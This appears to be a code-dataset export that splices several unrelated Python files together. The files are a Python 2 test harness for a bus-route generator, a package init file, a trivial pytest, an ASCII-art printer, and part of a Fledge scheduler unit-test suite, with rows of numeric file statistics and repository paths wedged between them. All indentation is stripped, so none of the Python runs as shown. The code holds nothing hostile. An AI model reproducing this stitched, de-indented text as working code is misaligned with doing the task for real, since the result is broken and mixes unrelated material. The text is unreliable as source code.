'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'departure_datetime', 'arrival_datetime',
'starting_timetable_entry_index', 'ending_timetable_entry_index'
}
way_document: {
'_id', 'osm_id', 'tags', 'references'
}
-- Route Generator Responses:
get_route_between_two_bus_stops: {
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'route': {
'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
'distances_from_starting_node', 'times_from_starting_node',
'distances_from_previous_node', 'times_from_previous_node'
}
}
get_route_between_multiple_bus_stops: [{
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'route': {
'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
'distances_from_starting_node', 'times_from_starting_node',
'distances_from_previous_node', 'times_from_previous_node'
}
}]
get_waypoints_between_two_bus_stops: {
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'waypoints': [[{
'_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'max_speed', 'road_type', 'way_id', 'traffic_density'
}]]
}
get_waypoints_between_multiple_bus_stops: [{
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'waypoints': [[{
'_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'max_speed', 'road_type', 'way_id', 'traffic_density'
}]]
}]
"""
import time
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../'))
from src.common.logger import log
from src.common.parameters import testing_bus_stop_names
from src.route_generator.route_generator_client import get_route_between_two_bus_stops, \
get_route_between_multiple_bus_stops, get_waypoints_between_two_bus_stops, get_waypoints_between_multiple_bus_stops
__author__ = 'Eleftherios Anagnostopoulos'
__email__ = 'eanagnostopoulos@hotmail.com'
__credits__ = [
'Azadeh Bararsani (Senior Researcher at Ericsson AB) - email: azadeh.bararsani@ericsson.com',
'Aneta Vulgarakis Feljan (Senior Researcher at Ericsson AB) - email: aneta.vulgarakis@ericsson.com'
]
def test_get_route_between_two_bus_stops(starting_bus_stop=None, ending_bus_stop=None,
starting_bus_stop_name=None, ending_bus_stop_name=None):
"""
:param starting_bus_stop: bus_stop_document
:param ending_bus_stop: bus_stop_document
:param starting_bus_stop_name: string
:param ending_bus_stop_name: string
"""
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_route_between_two_bus_stops: starting')
start_time = time.time()
# response = {
# 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'route': {
# 'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
# 'distances_from_starting_node', 'times_from_starting_node',
# 'distances_from_previous_node', 'times_from_previous_node'
# }
# }
response = get_route_between_two_bus_stops(
starting_bus_stop=starting_bus_stop,
ending_bus_stop=ending_bus_stop,
starting_bus_stop_name=starting_bus_stop_name,
ending_bus_stop_name=ending_bus_stop_name
)
starting_bus_stop = response.get('starting_bus_stop')
ending_bus_stop = response.get('ending_bus_stop')
route = response.get('route')
if route is not None:
total_distance = route.get('total_distance')
total_time = route.get('total_time')
node_osm_ids = route.get('node_osm_ids')
points = route.get('points')
edges = route.get('edges')
distances_from_starting_node = route.get('distances_from_starting_node')
times_from_starting_node = route.get('times_from_starting_node')
distances_from_previous_node = route.get('distances_from_previous_node')
times_from_previous_node = route.get('times_from_previous_node')
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop) + \
'\ntotal_distance: ' + str(total_distance) + \
'\ntotal_time: ' + str(total_time) + \
'\nnode_osm_ids: ' + str(node_osm_ids) + \
'\npoints: ' + str(points) + \
'\nedges: ' + str(edges) + \
'\ndistances_from_starting_node: ' + str(distances_from_starting_node) + \
'\ntimes_from_starting_node: ' + str(times_from_starting_node) + \
'\ndistances_from_previous_node: ' + str(distances_from_previous_node) + \
'\ntimes_from_previous_node: ' + str(times_from_previous_node)
else:
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop) + \
'\nroute: None'
print output
elapsed_time = time.time() - start_time
time.sleep(0.1)
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_route_between_two_bus_stops: finished - elapsed_time = ' +
str(elapsed_time) + ' sec')
def test_get_route_between_multiple_bus_stops(bus_stops=None, bus_stop_names=None):
"""
:param bus_stops: [bus_stop_document]
:param bus_stop_names: [string]
"""
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_route_between_multiple_bus_stops: starting')
start_time = time.time()
route_distance = 0
route_traveling_time = 0
# response = [{
# 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'route': {
# 'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
# 'distances_from_starting_node', 'times_from_starting_node',
# 'distances_from_previous_node', 'times_from_previous_node'
# }
# }]
response = get_route_between_multiple_bus_stops(
bus_stops=bus_stops,
bus_stop_names=bus_stop_names
)
for intermediate_response in response:
starting_bus_stop = intermediate_response.get('starting_bus_stop')
ending_bus_stop = intermediate_response.get('ending_bus_stop')
intermediate_route = intermediate_response.get('route')
if intermediate_route is not None:
total_distance = intermediate_route.get('total_distance')
route_distance += total_distance
total_time = intermediate_route.get('total_time')
route_traveling_time += total_time
node_osm_ids = intermediate_route.get('node_osm_ids')
points = intermediate_route.get('points')
edges = intermediate_route.get('edges')
distances_from_starting_node = intermediate_route.get('distances_from_starting_node')
times_from_starting_node = intermediate_route.get('times_from_starting_node')
distances_from_previous_node = intermediate_route.get('distances_from_previous_node')
times_from_previous_node = intermediate_route.get('times_from_previous_node')
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop) + \
'\ntotal_distance: ' + str(total_distance) + \
'\ntotal_time: ' + str(total_time) + \
'\nnode_osm_ids: ' + str(node_osm_ids) + \
'\npoints: ' + str(points) + \
'\nedges: ' + str(edges) + \
'\ndistances_from_starting_node: ' + str(distances_from_starting_node) + \
'\ntimes_from_starting_node: ' + str(times_from_starting_node) + \
'\ndistances_from_previous_node: ' + str(distances_from_previous_node) + \
'\ntimes_from_previous_node: ' + str(times_from_previous_node)
else:
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop) + \
'\nroute: None'
print output
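# NOTE (editor): the division below assumes route_traveling_time > 0; a zero
# total would raise ZeroDivisionError.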
route_average_speed = (route_distance / 1000) / (route_traveling_time / 3600)
print '\nroute_distance: ' + str(route_distance / 1000) + \
' - route_traveling_time: ' + str(route_traveling_time / 60) + \
' - route_average_speed: ' + str(route_average_speed)
elapsed_time = time.time() - start_time
time.sleep(0.1)
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_route_between_multiple_bus_stops: finished - elapsed_time = ' +
str(elapsed_time) + ' sec')
def test_get_waypoints_between_two_bus_stops(starting_bus_stop=None, ending_bus_stop=None,
starting_bus_stop_name=None, ending_bus_stop_name=None):
"""
:param starting_bus_stop: bus_stop_document
:param ending_bus_stop: bus_stop_document
:param starting_bus_stop_name: string
:param ending_bus_stop_name: string
"""
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_waypoints_between_two_bus_stops: starting')
start_time = time.time()
# response = {
# 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'waypoints': [[{
# '_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
# 'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
# 'max_speed', 'road_type', 'way_id', 'traffic_density'
# }]]
# }
response = get_waypoints_between_two_bus_stops(
starting_bus_stop=starting_bus_stop,
ending_bus_stop=ending_bus_stop,
starting_bus_stop_name=starting_bus_stop_name,
ending_bus_stop_name=ending_bus_stop_name
)
starting_bus_stop = response.get('starting_bus_stop')
ending_bus_stop = response.get('ending_bus_stop')
waypoints = response.get('waypoints')
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop)
print output
for separate_waypoints in waypoints:
print 'waypoints: ' + str(separate_waypoints)
elapsed_time = time.time() - start_time
time.sleep(0.1)
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_waypoints_between_two_bus_stops: finished - elapsed_time = ' +
str(elapsed_time) + ' sec')
def test_get_waypoints_between_multiple_bus_stops(bus_stops=None, bus_stop_names=None):
"""
:param bus_stops: [bus_stop_document]
:param bus_stop_names: [string]
"""
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_waypoints_between_multiple_bus_stops: starting')
start_time = time.time()
# response = [{
# 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'waypoints': [[{
# '_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
# 'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
# 'max_speed', 'road_type', 'way_id', 'traffic_density'
# }]]
# }]
response = get_waypoints_between_multiple_bus_stops(
bus_stops=bus_stops,
bus_stop_names=bus_stop_names
)
for intermediate_response in response:
starting_bus_stop = intermediate_response.get('starting_bus_stop')
ending_bus_stop = intermediate_response.get('ending_bus_stop')
waypoints = intermediate_response.get('waypoints')
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop)
print output
for separate_waypoints in waypoints:
print 'waypoints: ' + str(separate_waypoints)
elapsed_time = time.time() - start_time
time.sleep(0.1)
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_waypoints_between_multiple_bus_stops: finished - elapsed_time = ' +
str(elapsed_time) + ' sec')
if __name__ == '__main__':
selection = ''
while True:
selection = raw_input(
'\n0. exit'
'\n1. test_get_route_between_two_bus_stops'
'\n2. test_get_route_between_multiple_bus_stops'
'\n3. test_get_waypoints_between_two_bus_stops'
'\n4. test_get_waypoints_between_multiple_bus_stops'
'\nSelection: '
)
if selection == '0':
break
elif selection == '1':
test_get_route_between_two_bus_stops(
starting_bus_stop_name=testing_bus_stop_names[0],
ending_bus_stop_name=testing_bus_stop_names[1]
)
elif selection == '2':
test_get_route_between_multiple_bus_stops(
bus_stop_names=testing_bus_stop_names
)
elif selection == '3':
test_get_waypoints_between_two_bus_stops(
starting_bus_stop_name=testing_bus_stop_names[0],
ending_bus_stop_name=testing_bus_stop_names[1]
)
elif selection == '4':
test_get_waypoints_between_multiple_bus_stops(
bus_stop_names=testing_bus_stop_names
)
else:
print 'Invalid input'
| 43.579812 | 119 | 0.649609 | 2,183 | 18,565 | 5.066422 | 0.121393 | 0.081013 | 0.061031 | 0.027848 | 0.776763 | 0.764647 | 0.72613 | 0.705244 | 0.70226 | 0.690416 | 0 | 0.003018 | 0.214597 | 18,565 | 425 | 120 | 43.682353 | 0.755504 | 0.094263 | 0 | 0.513228 | 0 | 0 | 0.229712 | 0.101168 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.031746 | null | null | 0.042328 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
7c3b8f8f699a46823b3a538245f3bafebd9b481d
| 56 |
py
|
Python
|
12_module_release/message/__init__.py
|
DeveloperLY/Python-practice
|
85062afee1dc6b60b7011b0e3800b65fc9b9e9b2
|
[
"MIT"
] | null | null | null |
12_module_release/message/__init__.py
|
DeveloperLY/Python-practice
|
85062afee1dc6b60b7011b0e3800b65fc9b9e9b2
|
[
"MIT"
] | null | null | null |
12_module_release/message/__init__.py
|
DeveloperLY/Python-practice
|
85062afee1dc6b60b7011b0e3800b65fc9b9e9b2
|
[
"MIT"
] | null | null | null |
from . import send_message
from . import receive_message
| 28 | 29 | 0.839286 | 8 | 56 | 5.625 | 0.625 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 56 | 2 | 29 | 28 | 0.918367 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
7c5bbf4b4ce3af5182a0d6bd6aa48e224f1317d8
| 53 |
py
|
Python
|
test_stock.py
|
ucsb-cs48-w19/6pm-stock-trading
|
daf70b684c15182753d8ca9b820238cf9cd5b75c
|
[
"MIT"
] | 1 |
2019-04-06T15:44:07.000Z
|
2019-04-06T15:44:07.000Z
|
test_stock.py
|
ucsb-cs48-w19/6pm-stock-trading
|
daf70b684c15182753d8ca9b820238cf9cd5b75c
|
[
"MIT"
] | 35 |
2019-03-07T22:29:04.000Z
|
2021-12-13T19:55:51.000Z
|
test_stock.py
|
ucsb-cs48-w19/6pm-stock-trading
|
daf70b684c15182753d8ca9b820238cf9cd5b75c
|
[
"MIT"
] | 1 |
2019-12-18T23:06:37.000Z
|
2019-12-18T23:06:37.000Z
|
import pytest
def test_stock():
assert 0 == 0
| 8.833333 | 18 | 0.622642 | 8 | 53 | 4 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.245283 | 53 | 5 | 19 | 10.6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
7c84e9b3f92ddbf93482eff72a312c6afff49d17
| 173 |
py
|
Python
|
Level1_Input_Output/10172.py
|
jaeheeLee17/BOJ_Algorithms
|
c14641693d7ef0f5bba0a6637166c7ceadb2a0be
|
[
"MIT"
] | null | null | null |
Level1_Input_Output/10172.py
|
jaeheeLee17/BOJ_Algorithms
|
c14641693d7ef0f5bba0a6637166c7ceadb2a0be
|
[
"MIT"
] | null | null | null |
Level1_Input_Output/10172.py
|
jaeheeLee17/BOJ_Algorithms
|
c14641693d7ef0f5bba0a6637166c7ceadb2a0be
|
[
"MIT"
] | null | null | null |
def main():
print("|\_/|")
print("|q p| /}")
print("( 0 )\"\"\"\\")
print("|\"^\"` |")
print("||_/=\\\\__|")
if __name__ == "__main__":
main()
| 17.3 | 26 | 0.352601 | 14 | 173 | 3.5 | 0.571429 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007937 | 0.271676 | 173 | 9 | 27 | 19.222222 | 0.380952 | 0 | 0 | 0 | 0 | 0 | 0.289017 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | true | 0 | 0 | 0 | 0.125 | 0.625 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0
| 6 |
7c9ab847564a9551bd26274412cd272cd155cf72
| 69,601 |
py
|
Python
|
tests/unit/python/fledge/services/core/scheduler/test_scheduler.py
|
DDC-NDRS/fledge-iot_fledge
|
27a5e66a55daaab1aca14ce6e66f9f1e6efaef51
|
[
"Apache-2.0"
] | 69 |
2019-12-03T17:54:33.000Z
|
2022-03-13T07:05:23.000Z
|
tests/unit/python/fledge/services/core/scheduler/test_scheduler.py
|
DDC-NDRS/fledge-iot_fledge
|
27a5e66a55daaab1aca14ce6e66f9f1e6efaef51
|
[
"Apache-2.0"
] | 125 |
2020-02-13T15:11:28.000Z
|
2022-03-29T14:42:36.000Z
|
tests/unit/python/fledge/services/core/scheduler/test_scheduler.py
|
DDC-NDRS/fledge-iot_fledge
|
27a5e66a55daaab1aca14ce6e66f9f1e6efaef51
|
[
"Apache-2.0"
] | 24 |
2019-12-27T07:48:45.000Z
|
2022-03-13T07:05:28.000Z
|
# -*- coding: utf-8 -*-
# FLEDGE_BEGIN
# See: http://fledge-iot.readthedocs.io/
# FLEDGE_END
import asyncio
import datetime
import uuid
import time
import json
from unittest.mock import MagicMock, call
import sys
import copy
import pytest
from fledge.services.core.scheduler.scheduler import Scheduler, AuditLogger, ConfigurationManager
from fledge.services.core.scheduler.entities import *
from fledge.services.core.scheduler.exceptions import *
from fledge.common.storage_client.storage_client import StorageClientAsync
__author__ = "Amarendra K Sinha"
__copyright__ = "Copyright (c) 2017 OSIsoft, LLC"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
async def mock_task():
return ""
async def mock_process():
m = MagicMock()
m.pid = 9999
m.terminate = lambda: True
return m
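# NOTE (editor): mock_process stands in for the handle returned by
# asyncio.create_subprocess_exec; only the attributes these tests rely on
# (pid and terminate) are stubbed.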
@pytest.allure.feature("unit")
@pytest.allure.story("scheduler")
class TestScheduler:
async def scheduler_fixture(self, mocker):
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await mock_process()
else:
_rv = asyncio.ensure_future(mock_process())
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.object(scheduler, '_schedule_first_task')
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_paused', False)
mocker.patch.object(scheduler, '_process_scripts', return_value="North Readings to PI")
mocker.patch.object(scheduler, '_wait_for_task_completion', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.object(scheduler, '_terminate_child_processes')
mocker.patch.object(asyncio, 'create_subprocess_exec', return_value=_rv)
await scheduler._get_schedules()
schedule = scheduler._ScheduleRow(
id=uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34"),
process_name="North Readings to PI",
name="OMF to PI north",
type=Schedule.Type.INTERVAL,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
time=None,
day=None,
exclusive=True,
enabled=True)
log_exception = mocker.patch.object(scheduler._logger, "exception")
log_error = mocker.patch.object(scheduler._logger, "error")
log_debug = mocker.patch.object(scheduler._logger, "debug")
log_info = mocker.patch.object(scheduler._logger, "info")
return scheduler, schedule, log_info, log_exception, log_error, log_debug
@pytest.mark.asyncio
async def test__resume_check_schedules(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
# WHEN
# Check IF part
mocker.patch.object(scheduler, '_scheduler_loop_sleep_task', asyncio.Task(asyncio.sleep(5)))
scheduler._resume_check_schedules()
# THEN
assert scheduler._check_processes_pending is False
# WHEN
# Check ELSE part
mocker.patch.object(scheduler, '_scheduler_loop_sleep_task', None)
scheduler._resume_check_schedules()
# THEN
assert scheduler._check_processes_pending is True
@pytest.mark.asyncio
async def test__wait_for_task_completion(self, mocker):
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
mock_schedules = dict()
mock_schedule = scheduler._ScheduleRow(
id=uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34"),
process_name="North Readings to PI",
name="OMF to PI north",
type=Schedule.Type.INTERVAL,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
time=None,
day=None,
exclusive=True,
enabled=True)
mock_schedules[mock_schedule.id] = mock_schedule
mock_task_process = scheduler._TaskProcess()
mock_task_processes = dict()
mock_task_process.process = await asyncio.create_subprocess_exec("sleep", ".1")
mock_task_process.schedule = mock_schedule
mock_task_id = uuid.uuid4()
mock_task_process.task_id = mock_task_id
mock_task_processes[mock_task_process.task_id] = mock_task_process
mock_schedule_executions = dict()
mock_schedule_execution = scheduler._ScheduleExecution()
mock_schedule_executions[mock_schedule.id] = mock_schedule_execution
mock_schedule_executions[mock_schedule.id].task_processes[mock_task_id] = mock_task_process
mocker.patch.object(scheduler, '_resume_check_schedules')
mocker.patch.object(scheduler, '_schedule_next_task')
mocker.patch.multiple(scheduler, _schedules=mock_schedules,
_task_processes=mock_task_processes,
_schedule_executions=mock_schedule_executions)
mocker.patch.object(scheduler, '_process_scripts', return_value="North Readings to PI")
# WHEN
await scheduler._wait_for_task_completion(mock_task_process)
# THEN
# After task completion, sleep above, no task processes should be left pending
assert 0 == len(scheduler._task_processes)
assert 0 == len(scheduler._schedule_executions[mock_schedule.id].task_processes)
args, kwargs = log_info.call_args_list[0]
assert 'OMF to PI north' in args
assert 'North Readings to PI' in args
@pytest.mark.asyncio
async def test__start_task(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
mocker.patch.object(scheduler, '_schedule_first_task')
await scheduler._get_schedules()
schedule = scheduler._ScheduleRow(
id=uuid.UUID("2b614d26-760f-11e7-b5a5-be2e44b06b34"),
process_name="North Readings to PI",
name="OMF to PI north",
type=Schedule.Type.INTERVAL,
repeat=datetime.timedelta(seconds=30),
repeat_seconds=30,
time=None,
day=None,
exclusive=True,
enabled=True)
mocker.patch.object(scheduler, '_ready', True)
mocker.patch.object(scheduler, '_resume_check_schedules')
# Assert that there is no task queued for mock_schedule
with pytest.raises(KeyError) as excinfo:
assert scheduler._schedule_executions[schedule.id] is True
# Now queue task and assert that the task has been queued
await scheduler.queue_task(schedule.id)
assert isinstance(scheduler._schedule_executions[schedule.id], scheduler._ScheduleExecution)
# Changed in version 3.8: patch() now returns an AsyncMock if the target is an async function.
if sys.version_info.major == 3 and sys.version_info.minor >= 8:
_rv = await mock_process()
else:
_rv = asyncio.ensure_future(mock_process())
mocker.patch.object(asyncio, 'create_subprocess_exec', return_value=_rv)
mocker.patch.object(asyncio, 'ensure_future', return_value=asyncio.ensure_future(mock_task()))
mocker.patch.object(scheduler, '_resume_check_schedules')
mocker.patch.object(scheduler, '_process_scripts', return_value="North Readings to PI")
mocker.patch.object(scheduler, '_wait_for_task_completion')
# Confirm that task has not started yet
assert 0 == len(scheduler._schedule_executions[schedule.id].task_processes)
# WHEN
await scheduler._start_task(schedule)
# THEN
# Confirm that task has started
assert 1 == len(scheduler._schedule_executions[schedule.id].task_processes)
assert 1 == log_info.call_count
# assert call("Queued schedule '%s' for execution", 'OMF to PI north') == log_info.call_args_list[0]
args, kwargs = log_info.call_args_list[0]
assert "Process started: Schedule '%s' process '%s' task %s pid %s, %s running tasks\n%s" in args
assert 'OMF to PI north' in args
assert 'North Readings to PI' in args
@pytest.mark.asyncio
async def test_purge_tasks(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.multiple(scheduler, _ready=True, _paused=False)
mocker.patch.object(scheduler, '_max_completed_task_age', datetime.datetime.now())
# WHEN
await scheduler.purge_tasks()
# THEN
assert scheduler._purge_tasks_task is None
assert scheduler._last_task_purge_time is not None
@pytest.mark.asyncio
async def test__check_purge_tasks(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
mocker.patch.multiple(scheduler, _purge_tasks_task=None,
_last_task_purge_time=None)
mocker.patch.object(scheduler, 'purge_tasks', return_value=asyncio.ensure_future(mock_task()))
# WHEN
scheduler._check_purge_tasks()
# THEN
assert scheduler._purge_tasks_task is not None
@pytest.mark.asyncio
async def test__check_schedules(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
mocker.patch.multiple(scheduler, _max_running_tasks=10,
_start_time=current_time)
await scheduler._get_schedules()
mocker.patch.object(scheduler, '_start_task', return_value=asyncio.ensure_future(mock_task()))
# WHEN
earliest_start_time = await scheduler._check_schedules()
# THEN
assert earliest_start_time is not None
assert 3 == log_info.call_count
args0, kwargs0 = log_info.call_args_list[0]
args1, kwargs1 = log_info.call_args_list[1]
args2, kwargs2 = log_info.call_args_list[2]
assert 'stats collection' in args0
assert 'COAP listener south' in args1
assert 'OMF to PI north' in args2
@pytest.mark.asyncio
@pytest.mark.skip("_scheduler_loop() not suitable for unit testing. Will be tested during System tests.")
async def test__scheduler_loop(self, mocker):
pass
@pytest.mark.asyncio
async def test__schedule_next_timed_task(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
mocker.patch.multiple(scheduler, _max_running_tasks=10,
_start_time=current_time)
await scheduler._get_schedules()
sch_id = uuid.UUID("2176eb68-7303-11e7-8cf7-a6006ad3dba0") # stat collector
sch = scheduler._schedules[sch_id]
sch_execution = scheduler._schedule_executions[sch_id]
time_before_call = sch_execution.next_start_time
# WHEN
next_dt = datetime.datetime.fromtimestamp(sch_execution.next_start_time)
next_dt += datetime.timedelta(seconds=sch.repeat_seconds)
scheduler._schedule_next_timed_task(sch, sch_execution, next_dt)
time_after_call = sch_execution.next_start_time
# THEN
assert time_after_call > time_before_call
assert 3 == log_info.call_count
args0, kwargs0 = log_info.call_args_list[0]
args1, kwargs1 = log_info.call_args_list[1]
args2, kwargs2 = log_info.call_args_list[2]
assert 'stats collection' in args0
assert 'COAP listener south' in args1
assert 'OMF to PI north' in args2
@pytest.mark.asyncio
async def test__schedule_next_task(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
mocker.patch.multiple(scheduler, _max_running_tasks=10,
_start_time=current_time-3600)
await scheduler._get_schedules()
sch_id = uuid.UUID("2176eb68-7303-11e7-8cf7-a6006ad3dba0") # stat collector
sch = scheduler._schedules[sch_id]
sch_execution = scheduler._schedule_executions[sch_id]
time_before_call = sch_execution.next_start_time
# WHEN
scheduler._schedule_next_task(sch)
time_after_call = sch_execution.next_start_time
# THEN
assert time_after_call > time_before_call
assert 4 == log_info.call_count
args0, kwargs0 = log_info.call_args_list[0]
args1, kwargs1 = log_info.call_args_list[1]
args2, kwargs2 = log_info.call_args_list[2]
args3, kwargs3 = log_info.call_args_list[3]
assert 'stats collection' in args0
assert 'COAP listener south' in args1
assert 'OMF to PI north' in args2
# As part of scheduler._get_schedules(), scheduler._schedule_first_task() also gets executed, hence
# "stat collector" appears twice in this list.
assert 'stats collection' in args3
@pytest.mark.asyncio
async def test__schedule_first_task(self, mocker):
# TODO: Mandatory - Add negative tests for full code coverage
# GIVEN
scheduler = Scheduler()
scheduler._storage = MockStorage(core_management_host=None, core_management_port=None)
scheduler._storage_async = MockStorageAsync(core_management_host=None, core_management_port=None)
log_info = mocker.patch.object(scheduler._logger, "info")
current_time = time.time()
curr_time = datetime.datetime.fromtimestamp(current_time)
mocker.patch.multiple(scheduler, _max_running_tasks=10,
_start_time=current_time)
await scheduler._get_schedules()
sch_id = uuid.UUID("2176eb68-7303-11e7-8cf7-a6006ad3dba0") # stat collector
sch = scheduler._schedules[sch_id]
sch_execution = scheduler._schedule_executions[sch_id]
# WHEN
scheduler._schedule_first_task(sch, current_time)
time_after_call = sch_execution.next_start_time
# THEN
assert time_after_call > time.mktime(curr_time.timetuple())
assert 4 == log_info.call_count
